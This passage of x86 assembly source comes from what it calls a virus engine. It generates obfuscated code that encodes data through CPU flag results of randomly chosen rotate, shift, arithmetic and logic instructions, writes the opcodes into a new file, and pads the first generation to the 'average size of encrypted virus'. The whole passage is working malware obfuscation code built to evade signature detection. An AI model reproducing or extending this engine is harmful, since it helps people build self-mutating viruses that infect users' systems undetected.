jmp DoNibbleEnd
|
|
|
|
|
|
DoNF_PUSHFD:
|
|
mov byte[edi], 0x9C ; pushfd
|
|
inc edi
|
|
|
|
test byte[RandomNumber], 0100'0000b
|
|
jnz DoNF_PUSHFD_AL
|
|
|
|
|
|
mov al, byte[RandomNumber]
|
|
and al, 0000'0011b
|
|
add al, 0x58
|
|
mov byte[edi+00], al ; pop e(a|c|d|b)x
|
|
|
|
mov byte[edi+01], 0x88
|
|
and al, 0000'0011b
|
|
shl al, 3
|
|
or al, 0000'0111b
|
|
mov byte[edi+02], al ; mov byte[edi], (a|c|d|b)l
|
|
mov byte[edi+03], 0x47 ; inc edi (thx hh86 :D)
|
|
add edi, 4
|
|
jmp DoNibbleEnd
|
|
|
|
DoNF_PUSHFD_AL:
|
|
mov byte[edi+00], 0x58 ; pop eax
|
|
mov byte[edi+01], 0xAA ; stos
|
|
add edi, 2
|
|
; jmp DoNibbleEnd
|
|
|
|
DoNibbleEnd:
|
|
|
|
mov dword[VerifiedAddress], edi
|
|
|
|
ret
|
|
|
|
; ###########################################################################
|
|
; #####
|
|
; ##### Generate Nibbles
|
|
; #####
|
|
|
|
|
|
|
|
|
|
; ###########################################################################
|
|
; ##### Nibble 0: CF - (ROL, ROR)
|
|
|
|
GenerateNibble0:
|
|
; edi ... pointer in filecode
|
|
; bl & 0000'1111b ... nibble to generate
|
|
|
|
|
|
; ebp:
|
|
; 0 ... rol Reg, 1
|
|
; 1 ... rol Reg, cl
|
|
|
|
; 3 ... ror Reg, cl
|
|
|
|
|
|
|
|
call InformationToFlagByte ; bh=flag byte
|
|
|
|
GN0_GetTypeAgain:
|
|
call GetRandomNumber
|
|
mov ebp, dword[RandomNumber]
|
|
and ebp, 0000'0011b
|
|
|
|
cmp ebp, 2
|
|
je GN0_GetTypeAgain
|
|
|
|
push 0 ; loop counter
|
|
|
|
GN0_CF_loop: ; rol Reg, 1
|
|
|
|
pop ecx
|
|
inc ecx
|
|
push ecx
|
|
cmp ecx, 0x2A
|
|
ja GN_PossibleInfinitLoop
|
|
|
|
GN0_CF_GetAnotherCL:
|
|
call GetRandomNumber
|
|
mov ecx, dword[RandomNumber]
|
|
|
|
test ecx, 0001'1111b ; shiftcount must not be zero
|
|
jz GN0_CF_GetAnotherCL
|
|
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
push eax
|
|
|
|
cmp ebp, 0
|
|
jne GN0_CF_loop_ROLN
|
|
|
|
rol eax, 1
|
|
jmp GN0_CF_loop_LAHF
|
|
|
|
GN0_CF_loop_ROLN: ; rol Reg, N/cl
|
|
cmp ebp, 1
|
|
jne GN0_CF_loop_RORN
|
|
|
|
rol eax, cl
|
|
jmp GN0_CF_loop_LAHF
|
|
|
|
GN0_CF_loop_RORN: ; ror Reg, N/cl
|
|
ror eax, cl
|
|
; jmp GN0_CF_loop_LAHF
|
|
|
|
|
|
GN0_CF_loop_LAHF:
|
|
lahf
|
|
|
|
pop edx
|
|
|
|
and ah, byte[FlagMask]
|
|
and bh, byte[FlagMask]
|
|
|
|
cmp ah, bh
|
|
jne GN0_CF_loop
|
|
|
|
pop eax ; remove counter
|
|
|
|
GN0_GetDifferentRegister:
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
and al, 0000'0011b
|
|
cmp al, 0000'0001b
|
|
je GN0_GetDifferentRegister ; dont use ECX because we can use CL as second parameter (~2h to find this :) )
|
|
|
|
or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx)
|
|
mov byte[edi], al
|
|
inc edi
|
|
|
|
mov dword[edi], edx
|
|
add edi, 4
|
|
|
|
push ebp
|
|
and ebp, 0000'0001b
|
|
pop ebp
|
|
jnz GN0_CFN ; is it "rotate Reg, 1" ?
|
|
|
|
mov byte[edi], 0xD1
|
|
inc edi
|
|
|
|
and al, 0000'0011b
|
|
cmp ebp, 0
|
|
jne GN0_CF_CreateCode_ROR
|
|
add al, 0xC0
|
|
jmp GN0_CF_CreateCode_done
|
|
|
|
GN0_CF_CreateCode_ROR:
|
|
add al, 0xC8
|
|
|
|
GN0_CF_CreateCode_done:
|
|
mov byte[edi], al
|
|
inc edi
|
|
jmp GN0_CF_End
|
|
|
|
|
|
|
|
GN0_CFN:
|
|
|
|
mov byte[edi], 0xB9
|
|
inc edi
|
|
|
|
mov dword[edi], ecx
|
|
add edi, 4
|
|
|
|
mov byte[edi], 0xD3
|
|
inc edi
|
|
|
|
and al, 0000'0011b
|
|
|
|
and ebp, 0000'0010b
|
|
jnz GN0_CFN_ROR
|
|
|
|
add al, 0xC0
|
|
jmp GN0_CF_Write_End
|
|
|
|
GN0_CFN_ROR:
|
|
add al, 0xC8
|
|
|
|
GN0_CF_Write_End:
|
|
mov byte[edi], al
|
|
inc edi
|
|
|
|
|
|
|
|
GN0_CF_End:
|
|
mov dword[VerifiedAddress], edi
|
|
|
|
ret
|
|
|
|
|
|
; ##### Nibble 0: CF - (ROL, ROR)
|
|
; ###########################################################################
|
|
|
|
|
|
|
|
|
|
; ###########################################################################
|
|
; ##### Nibble 1: AF, CF (PF, SF undefined) - (AAA, AAS)
|
|
|
|
GenerateNibble1:
|
|
; edi ... pointer in filecode
|
|
; bl & 0000'1111b ... nibble to generate
|
|
|
|
|
|
|
|
call InformationToFlagByte ; bh=flag byte
|
|
|
|
call GetRandomNumber
|
|
mov ebp, dword[RandomNumber]
|
|
and ebp, 0000'0001b
|
|
|
|
push 0 ; loop counter
|
|
|
|
GN1_Loop:
|
|
|
|
pop eax
|
|
inc eax
|
|
push eax
|
|
cmp eax, 0x2A
|
|
ja GN_PossibleInfinitLoop
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
push eax
|
|
|
|
cmp ebp, 0 ; this instruction clears AF. Thats important because
|
|
jne GN1_Aaa ; AAA and AAS depend on AF, and influence CF depending on it.
|
|
|
|
aas
|
|
jmp GN1_LAHF
|
|
|
|
GN1_Aaa:
|
|
aaa
|
|
jmp GN1_LAHF
|
|
|
|
GN1_LAHF:
|
|
pop edx
|
|
|
|
lahf
|
|
|
|
and ah, byte[FlagMask]
|
|
and bh, byte[FlagMask]
|
|
cmp ah, bh
|
|
jne GN1_Loop
|
|
|
|
pop eax ; remove counter
|
|
|
|
mov byte[edi], 0xB8
|
|
inc edi
|
|
|
|
mov dword[edi], edx ; mov Reg1, NUMBER
|
|
add edi, 4
|
|
|
|
|
|
cmp ebp, 0
|
|
jne GN1_WriteAaa
|
|
|
|
mov byte[edi], 0x3F
|
|
inc edi
|
|
jmp GN1_Fin
|
|
|
|
GN1_WriteAaa:
|
|
mov byte[edi], 0x37
|
|
inc edi
|
|
|
|
GN1_Fin:
|
|
mov dword[VerifiedAddress], edi
|
|
|
|
|
|
ret
|
|
|
|
|
|
; ##### Nibble 1: AF, CF (PF, SF undefined) - (AAA, AAS)
|
|
; ###########################################################################
|
|
|
|
|
|
|
|
|
|
; ###########################################################################
|
|
; ##### Nibble 2: CF PF (AF undefined, SF undefined?) - (SHL, SHR, SAL, SAR)
|
|
|
|
GenerateNibble2:
|
|
; edi ... pointer in filecode
|
|
; bl & 0000'1111b ... nibble to generate
|
|
|
|
|
|
; ebp:
|
|
; 0 ... shl Reg, 1
|
|
; 1 ... shl Reg, N/cl
|
|
; 4 ... sal Reg, 1
|
|
; 5 ... sal Reg, N/cl
|
|
; 7 ... sar Reg, N/cl
|
|
|
|
|
|
call InformationToFlagByte ; bh=flag byte
|
|
|
|
GN2_GetTypeAgain:
|
|
call GetRandomNumber
|
|
mov ebp, dword[RandomNumber]
|
|
and ebp, 0000'0111b
|
|
|
|
cmp ebp, 2
|
|
je GN2_GetTypeAgain
|
|
cmp ebp, 3
|
|
je GN2_GetTypeAgain
|
|
cmp ebp, 6
|
|
je GN2_GetTypeAgain
|
|
|
|
push 0 ; counter
|
|
|
|
GN2_Shift_loop: ; shl Reg, 1
|
|
|
|
pop ecx
|
|
inc ecx
|
|
push ecx
|
|
cmp ecx, 0x2A
|
|
ja GN_PossibleInfinitLoop
|
|
|
|
call GetRandomNumber
|
|
mov ecx, dword[RandomNumber]
|
|
|
|
GN2_CF_GetAnotherCL:
|
|
call GetRandomNumber
|
|
mov ecx, dword[RandomNumber]
|
|
|
|
test ecx, 0001'1111b ; shiftcount must not be zero
|
|
jz GN2_CF_GetAnotherCL
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
push eax
|
|
|
|
cmp ebp, 0
|
|
jne GN2_Shift_loop_SHLN
|
|
|
|
shl eax, 1
|
|
jmp GN2_Shift_loop_LAHF
|
|
|
|
GN2_Shift_loop_SHLN: ; shl Reg, N/cl
|
|
cmp ebp, 1
|
|
jne GN2_Shift_loop_SAL1
|
|
|
|
shl eax, cl
|
|
jmp GN2_Shift_loop_LAHF
|
|
|
|
GN2_Shift_loop_SAL1: ; sal Reg, 1
|
|
cmp ebp, 4
|
|
jne GN2_Shift_loop_SALN
|
|
|
|
sal eax, 1
|
|
jmp GN2_Shift_loop_LAHF
|
|
|
|
|
|
GN2_Shift_loop_SALN: ; sal Reg, N
|
|
cmp ebp, 5
|
|
jne GN2_Shift_loop_SARN
|
|
|
|
sal eax, cl
|
|
jmp GN2_Shift_loop_LAHF
|
|
|
|
|
|
GN2_Shift_loop_SARN: ; sar Reg, N
|
|
sar eax, cl
|
|
; jmp GN3_Shift_loop_LAHF
|
|
|
|
|
|
GN2_Shift_loop_LAHF:
|
|
lahf
|
|
|
|
pop edx
|
|
|
|
and ah, byte[FlagMask]
|
|
and bh, byte[FlagMask]
|
|
|
|
cmp ah, bh
|
|
jne GN2_Shift_loop
|
|
|
|
pop eax ; remove counter
|
|
|
|
GN2_GetDifferentRegister:
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
and al, 0000'0011b
|
|
cmp al, 0000'0001b
|
|
je GN2_GetDifferentRegister ; dont use ECX because we can use CL as second parameter (~2h to find this :) )
|
|
|
|
or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, edx)
|
|
mov byte[edi], al
|
|
inc edi
|
|
|
|
mov dword[edi], edx
|
|
add edi, 4
|
|
|
|
push ebp
|
|
and ebp, 0000'0001b
|
|
pop ebp
|
|
jnz GN2_ShiftN ; is it "shift Reg, 1" ?
|
|
|
|
mov byte[edi], 0xD1
|
|
inc edi
|
|
|
|
and al, 0000'0011b
|
|
cmp ebp, 0
|
|
jne GN2_Shift_CreateCode_SAL
|
|
add al, 0xE0
|
|
jmp GN2_Shift_CreateCode_done
|
|
|
|
GN2_Shift_CreateCode_SAL:
|
|
cmp ebp, 4
|
|
jne GN2_Shift_CreateCode_SAR
|
|
add al, 0xF0
|
|
jmp GN2_Shift_CreateCode_done
|
|
|
|
GN2_Shift_CreateCode_SAR:
|
|
add al, 0xF0
|
|
|
|
GN2_Shift_CreateCode_done:
|
|
mov byte[edi], al
|
|
inc edi
|
|
jmp GN2_Shift_End
|
|
|
|
GN2_ShiftN:
|
|
|
|
and al, 0000'0011b
|
|
|
|
cmp ebp, 1
|
|
jne GN2_ShiftNum_NotShl
|
|
|
|
add al, 0xE0 ; shl
|
|
jmp GN2_ShiftNum_WriteNow
|
|
|
|
GN2_ShiftNum_NotShl:
|
|
cmp ebp, 5
|
|
jne GN2_ShiftNum_NotSal
|
|
|
|
add al, 0xF0 ; sal
|
|
jmp GN2_ShiftNum_WriteNow
|
|
|
|
GN2_ShiftNum_NotSal:
|
|
add al, 0xF8 ; sar
|
|
; jmp GN2_ShiftNum_WriteNow
|
|
|
|
GN2_ShiftNum_WriteNow:
|
|
|
|
call GetRandomNumber
|
|
mov ah, byte[RandomNumber] ; 0 ... shift Reg, NNNN
|
|
; 1 ... shift Reg, cl
|
|
and ah, 0000'0001b
|
|
|
|
jz GN2_Shift_Num
|
|
|
|
mov byte[edi], 0xB9 ; mov ecx, ...
|
|
inc edi
|
|
|
|
mov dword[edi], ecx
|
|
add edi, 4
|
|
|
|
mov byte[edi], 0xD3
|
|
inc edi
|
|
|
|
mov byte[edi], al
|
|
inc edi
|
|
jmp GN2_Shift_End
|
|
|
|
GN2_Shift_Num:
|
|
mov byte[edi], 0xC1
|
|
inc edi
|
|
|
|
mov byte[edi], al
|
|
inc edi
|
|
|
|
mov byte[edi], cl
|
|
inc edi
|
|
|
|
|
|
GN2_Shift_End:
|
|
|
|
mov dword[VerifiedAddress], edi
|
|
ret
|
|
|
|
|
|
; ##### Nibble 2: CF PF (AF undefined, SF undefined?) - (SHL, SHR, SAL, SAR)
|
|
; ###########################################################################
|
|
|
|
|
|
; ###########################################################################
|
|
; ##### Nibble 3: PF SF (AF undefined) - (AND, XOR, TEST)
|
|
|
|
GenerateNibble3:
|
|
; edi ... pointer in filecode
|
|
; bl & 0000'1111b ... nibble to generate
|
|
|
|
|
|
|
|
call InformationToFlagByte ; bh=flag byte
|
|
|
|
call GetRandomNumber
|
|
mov ebp, dword[RandomNumber]
|
|
and ebp, 0000'0011b
|
|
|
|
push 0
|
|
|
|
GN3_AndXorTest_Loop:
|
|
|
|
pop eax
|
|
inc eax
|
|
push eax
|
|
cmp eax, 0x2A
|
|
ja GN_PossibleInfinitLoop
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
push eax
|
|
|
|
call GetRandomNumber
|
|
mov ecx, dword[RandomNumber]
|
|
|
|
cmp ebp, 0
|
|
jne GN3_AndXorTest_NotAnd
|
|
and eax, ecx
|
|
jmp GN3_AndXorTest_LAHF
|
|
|
|
GN3_AndXorTest_NotAnd:
|
|
cmp ebp, 1
|
|
jne GN3_AndXorTest_NotXor
|
|
xor eax, ecx
|
|
jmp GN3_AndXorTest_LAHF
|
|
|
|
GN3_AndXorTest_NotXor:
|
|
test eax, ecx
|
|
jmp GN3_AndXorTest_LAHF
|
|
|
|
GN3_AndXorTest_LAHF:
|
|
pop edx
|
|
|
|
lahf
|
|
|
|
and ah, byte[FlagMask]
|
|
and bh, byte[FlagMask]
|
|
cmp ah, bh
|
|
jne GN3_AndXorTest_Loop
|
|
|
|
pop eax ; remove counter
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
and eax, 0000'0011b
|
|
or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx)
|
|
mov byte[edi], al
|
|
and eax, 0000'0011b
|
|
inc edi
|
|
|
|
mov dword[edi], edx ; mov Reg1, NUMBER
|
|
add edi, 4
|
|
|
|
and eax, 0000'0011b
|
|
|
|
call GetRandomNumber
|
|
mov esi, dword[RandomNumber]
|
|
and esi, 0000'0001b
|
|
|
|
je GN3_AndXorTest_Num
|
|
; and Reg1, Reg2
|
|
GN3_AndXorTest_TwoRegisters_Next:
|
|
call GetRandomNumber
|
|
mov ebx, dword[RandomNumber]
|
|
and ebx, 0011b
|
|
cmp ebx, eax
|
|
je GN3_AndXorTest_TwoRegisters_Next ; Not the same registers!
|
|
|
|
or bl, 0xB8
|
|
mov byte[edi], bl ; mov Reg2, ...
|
|
inc edi
|
|
mov dword[edi], ecx ; mov Reg2, NNNN
|
|
add edi, 4
|
|
|
|
cmp ebp, 0
|
|
jne GN3_AndXorTest_2Regs_NoAnd
|
|
mov byte[edi], 0x21
|
|
jmp GN3_AndXorTest_2Regs_cont1
|
|
|
|
GN3_AndXorTest_2Regs_NoAnd:
|
|
cmp ebp, 1
|
|
jne GN3_AndXorTest_2Regs_NoXor
|
|
|
|
mov byte[edi], 0x31
|
|
jmp GN3_AndXorTest_2Regs_cont1
|
|
|
|
GN3_AndXorTest_2Regs_NoXor:
|
|
mov byte[edi], 0x85
|
|
jmp GN3_AndXorTest_2Regs_cont1
|
|
|
|
GN3_AndXorTest_2Regs_cont1:
|
|
inc edi
|
|
|
|
and bl, 0011b ; Reg2
|
|
shl bl, 3 ; bl=000??000
|
|
add bl, al ; bl=000??0??
|
|
add bl, 1100'0000b ; bl=110??0??
|
|
mov byte[edi], bl
|
|
inc edi
|
|
jmp GN3_AndXorTest_Fin
|
|
|
|
GN3_AndXorTest_Num:
|
|
push ebp
|
|
and ebp, 0000'0010b
|
|
pop ebp
|
|
jz GN3_AndXorTest_Num_AndXor
|
|
|
|
mov byte[edi], 0xF7
|
|
inc edi
|
|
|
|
or al, 0xC0
|
|
mov byte[edi], al
|
|
inc edi
|
|
|
|
mov dword[edi], ecx
|
|
add edi, 4
|
|
jmp GN3_AndXorTest_Fin
|
|
|
|
|
|
GN3_AndXorTest_Num_AndXor:
|
|
mov byte[edi], 0x81
|
|
inc edi
|
|
|
|
cmp ebp, 0
|
|
jne GN3_AndXorTest_Num_NoAnd
|
|
or al, 0xE0
|
|
jmp GN3_AndXorTest_Num_cont1
|
|
|
|
GN3_AndXorTest_Num_NoAnd:
|
|
or al, 0xF0
|
|
; jmp GN3_AndXorTest_Num_cont1
|
|
|
|
GN3_AndXorTest_Num_cont1:
|
|
mov byte[edi], al
|
|
inc edi
|
|
|
|
mov dword[edi], ecx
|
|
add edi, 4
|
|
|
|
GN3_AndXorTest_Fin:
|
|
|
|
mov dword[VerifiedAddress], edi
|
|
ret
|
|
|
|
|
|
; ##### Nibble 3: CF PF SF (AF undefined) - (AND, XOR, TEST)
|
|
; ###########################################################################
|
|
|
|
|
|
|
|
; ###########################################################################
|
|
; ##### Nibble 4: AF PF SF (DEC, INC)
|
|
|
|
GenerateNibble4:
|
|
; edi ... pointer in filecode
|
|
; bl & 0000'1111b ... nibble to generate
|
|
|
|
|
|
call InformationToFlagByte ; bh=flag byte
|
|
|
|
call GetRandomNumber
|
|
mov ebp, dword[RandomNumber]
|
|
and ebp, 0000'0001b
|
|
|
|
|
|
push 0
|
|
|
|
GN4_IncDec_Loop:
|
|
|
|
pop eax
|
|
inc eax
|
|
push eax
|
|
cmp eax, 0x2A
|
|
ja GN_PossibleInfinitLoop
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
push eax
|
|
|
|
cmp ebp, 0
|
|
je GN4_IncDec_Loop_DEC
|
|
|
|
inc eax
|
|
lahf
|
|
jmp GN4_IncDec_Loop_fin
|
|
|
|
GN4_IncDec_Loop_DEC:
|
|
dec eax
|
|
lahf
|
|
|
|
GN4_IncDec_Loop_fin:
|
|
pop edx
|
|
|
|
and ah, byte[FlagMask]
|
|
and bh, byte[FlagMask]
|
|
cmp ah, bh
|
|
jne GN4_IncDec_Loop
|
|
|
|
pop eax ; remove counter
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
and al, 0000'0011b
|
|
or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx)
|
|
mov byte[edi], al
|
|
inc edi
|
|
|
|
mov dword[edi], edx
|
|
add edi, 4
|
|
|
|
|
|
and al, 0000'0011b
|
|
|
|
cmp ebp, 1
|
|
je GN4_IncDec_Loop_writeByteINC
|
|
|
|
add al, 8
|
|
|
|
GN4_IncDec_Loop_writeByteINC:
|
|
add al, 0x40
|
|
|
|
mov byte[edi], al
|
|
inc edi
|
|
|
|
mov dword[VerifiedAddress], edi
|
|
ret
|
|
|
|
|
|
; ##### Nibble 4: AF PF SF (DEC, INC)
|
|
; ###########################################################################
|
|
|
|
|
|
; ###########################################################################
|
|
; ##### Nibble 5: AF CF PF SF (ADD, CMD, NEG, SUB)
|
|
|
|
|
|
GenerateNibble5:
|
|
; edi ... pointer in filecode
|
|
; bl & 0000'1111b ... nibble to generate
|
|
|
|
; AF CF PF SF
|
|
; using ADD, SUB, CMP, NEG
|
|
|
|
call GetRandomNumber
|
|
mov ebp, dword[RandomNumber]
|
|
and ebp, 0000'0011b
|
|
|
|
cmp ebp, 0x0
|
|
je GN5_Neg
|
|
|
|
|
|
|
|
GN8AddSubCmpNext:
|
|
call GetRandomNumber
|
|
mov ebp, dword[RandomNumber]
|
|
and ebp, 0000'0011b ; ebp tells which instruction to use (1=add, 2=sub, 3=cmp)
|
|
jz GN8AddSubCmpNext
|
|
jmp GN5_AddSubCmp
|
|
|
|
GN5_fin:
|
|
|
|
mov dword[VerifiedAddress], edi
|
|
ret
|
|
|
|
|
|
|
|
GN5_Neg:
|
|
call InformationToFlagByte ; bh=flag byte
|
|
|
|
push 0
|
|
|
|
GN5_Neg_Loop:
|
|
|
|
pop eax
|
|
inc eax
|
|
push eax
|
|
cmp eax, 0x2A
|
|
ja GN_PossibleInfinitLoop
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
push eax
|
|
|
|
neg eax
|
|
lahf
|
|
|
|
pop edx
|
|
|
|
cmp ah, bh
|
|
jne GN5_Neg_Loop
|
|
|
|
pop eax
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
and al, 0000'0011b
|
|
or al, 0xB8 ; al=1011'10NN - NN...random (eax, ebx, ecx, edx)
|
|
mov byte[edi], al
|
|
inc edi
|
|
|
|
mov dword[edi], edx
|
|
add edi, 4
|
|
|
|
mov byte[edi], 0xF7
|
|
inc edi
|
|
|
|
and al, 0000'0011b
|
|
add al, 0xD8
|
|
mov byte[edi], al
|
|
inc edi
|
|
|
|
jmp GN5_fin
|
|
|
|
|
|
|
|
|
|
GN5_AddSubCmp:
|
|
call InformationToFlagByte ; bh=flag byte
|
|
call GetRandomNumber
|
|
|
|
push 0 ; loop counter
|
|
|
|
GN5_AddSubCmp_Loop:
|
|
|
|
pop edx
|
|
inc edx
|
|
push edx
|
|
cmp edx, 0x2A
|
|
ja GN_PossibleInfinitLoop
|
|
|
|
mov edx, dword[RandomNumber]
|
|
push edx
|
|
call GetRandomNumber
|
|
mov esi, dword[RandomNumber]
|
|
|
|
cmp ebp, 1
|
|
je GN5_AddSubCmp_Loop_Sub
|
|
|
|
cmp ebp, 2
|
|
je GN5_AddSubCmp_Loop_Cmp
|
|
|
|
mov ecx, 0x01C0
|
|
add edx, esi
|
|
jmp GN5_AddSubCmp_Loop_LAHF
|
|
|
|
GN5_AddSubCmp_Loop_Sub:
|
|
mov ecx, 0x29E8
|
|
sub edx, esi
|
|
jmp GN5_AddSubCmp_Loop_LAHF
|
|
|
|
GN5_AddSubCmp_Loop_Cmp:
|
|
mov ecx, 0x39F8
|
|
cmp edx, esi
|
|
|
|
|
|
GN5_AddSubCmp_Loop_LAHF:
|
|
lahf
|
|
|
|
pop edx
|
|
|
|
and ah, byte[FlagMask]
|
|
and bh, byte[FlagMask]
|
|
cmp ah, bh
|
|
jne GN5_AddSubCmp_Loop
|
|
|
|
pop eax ; remove counter
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
and eax, 0000'0011b ; create Register number
|
|
push eax ; save Register number
|
|
|
|
mov bl, al
|
|
add bl, 0xB8
|
|
|
|
mov byte[edi], bl
|
|
inc edi
|
|
|
|
mov dword[edi], edx
|
|
add edi, 4 ; mov Reg1, NNNN
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
and eax, 1
|
|
|
|
jz GN5_AddSubCmp_TwoRegisters
|
|
|
|
|
|
mov byte[edi], 0x81
|
|
inc edi
|
|
|
|
mov dl, cl
|
|
pop eax ; get Register number
|
|
add dl, al ; use Register number
|
|
mov byte[edi], dl ; add Reg, ...
|
|
inc edi
|
|
mov dword[edi], esi
|
|
add edi, 4
|
|
jmp GN5_fin
|
|
|
|
GN5_AddSubCmp_TwoRegisters:
|
|
|
|
pop eax ; Register number
|
|
and al, 0000'0011b
|
|
|
|
GN5_AddSubCmp_TwoRegisters_Next:
|
|
call GetRandomNumber
|
|
mov ebx, dword[RandomNumber]
|
|
and ebx, 0011b
|
|
cmp ebx, eax
|
|
je GN5_AddSubCmp_TwoRegisters_Next ; Not the same registers!
|
|
|
|
or bl, 0xB8
|
|
mov byte[edi], bl ; mov Reg2, ...
|
|
inc edi
|
|
mov dword[edi], esi ; mov Reg2, NNNN
|
|
add edi, 4
|
|
|
|
and bl, 0011b ; Reg2
|
|
shl bl, 3 ; bl=000??000
|
|
add bl, al ; bl=000??0??
|
|
or bl, 1100'0000b ; bl=110??0??
|
|
mov byte[edi], ch
|
|
inc edi
|
|
mov byte[edi], bl
|
|
inc edi ; add Reg1, Reg2
|
|
|
|
jmp GN5_fin
|
|
|
|
; ##### Nibble 5: AF CF PF SF (ADD, CMD, NEG, SUB)
|
|
; ###########################################################################
|
|
|
|
InformationToFlagByte:
|
|
; in: bl=0000'SAPC
|
|
; out: bh=S00A'0P1C
|
|
|
|
push eax
|
|
mov al, bl
|
|
; CF:
|
|
mov bh, bl ; ah=0000'SAPC
|
|
and bh, 0000'0001b ; ah=0000'000C
|
|
|
|
; PF:
|
|
shl bl, 1 ; al=000S'APC0
|
|
or bh, bl ; ah=000S'APCC
|
|
and bh, 0000'0101b ; ah=0000'0P0C
|
|
|
|
; AF:
|
|
shl bl, 1 ; al=00SA'PC00
|
|
and bl, 0011'0000b ; al=00SA'0000
|
|
or bh, bl ; ah=00SA'0P0C
|
|
and bh, 0001'0101b ; ah=000A'0P0C
|
|
|
|
; SF:
|
|
shl bl, 2 ; al=SA00'0000
|
|
or bh, bl ; ah=SA0A'0P0C
|
|
and bh, 1001'0101b ; ah=S00A'0P0C
|
|
or bh, 0000'0010b ; ah=S00A'0P1C
|
|
|
|
xchg al, bl
|
|
pop eax
|
|
ret
|
|
|
|
|
|
GN_PossibleInfinitLoop:
|
|
; given Nibble could not be created with current methode
|
|
; therefore give up after 42+ trials and try with another one
|
|
|
|
|
|
pop eax ; remove counter
|
|
pop eax ; remove return-addresse
|
|
|
|
mov edi, dword[VerifiedAddress] ; last correct addresse of file
|
|
|
|
; if there has already been some code written to the
|
|
; new file, it can be considered as random functional trash :)
|
|
|
|
jmp CreateCodeForNibble
|
|
|
|
|
|
|
|
; #####
|
|
; ##### Generate Nibbles
|
|
; #####
|
|
; ###########################################################################
|
|
|
|
|
|
GetRandomNumber:
|
|
pushad
|
|
xor edx, edx
|
|
mov eax, dword[RandomNumber]
|
|
ror eax, 16
|
|
|
|
mov ebx, 1103515245
|
|
mul ebx ; EDX:EAX = EDX:EAX * EBX
|
|
|
|
add eax, 12345
|
|
rol eax, 16
|
|
mov dword[RandomNumber], eax
|
|
popad
|
|
ret
|
|
|
|
CreateSpecialRndNumber:
|
|
; in: ebx, ecx
|
|
; out: edx=(rand()%ebx + ecx)
|
|
|
|
call GetRandomNumber
|
|
|
|
xor edx, edx
|
|
mov eax, dword[RandomNumber]
|
|
div ebx
|
|
|
|
add edx, ecx
|
|
ret
|
|
|
|
WholeCodeEnd:
|
|
|
|
times (175'269 + 7 * 1149 - (WholeCodeEnd-StartEngine)) db 0x0 ; 1st generation padding
|
|
; This is average size of encrypted virus + 7 * sigma - 1st gen. code
|
|
; 7*sigma ~ 99.999999999744 % of all cases
|
|
; (i took the average of 15files, as statistics is very high in one
|
|
; file, this is to a very good approx. gauss distributed)
|
|
.end start |